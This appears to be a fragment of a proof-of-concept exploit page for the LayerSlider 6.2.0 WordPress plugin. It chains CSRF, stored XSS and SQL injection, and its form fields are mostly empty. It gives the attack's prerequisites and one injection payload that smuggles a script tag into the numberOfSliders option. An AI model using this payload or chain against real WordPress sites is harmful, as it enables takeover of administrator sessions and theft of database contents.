LayerSlider 6.2.0 CSRF -> Sored XSS -> SQL Injection



You need to be logged with Admin privileges on the target URL, and
to have at least 1 slider for this to work.

Also you might want to allow popups.

Tested on WordPress 4.7.3


Target URL:
* Note, /wp-admin/admin-ajax.php gets appended automatically if needed

Output log

None ? means not found in the charset, _ means AJAX error.

The Form

action :ls_save_screen_options
options[numberOfSliders] : 11"> <script src=></script>

Iframe for POST result

POC by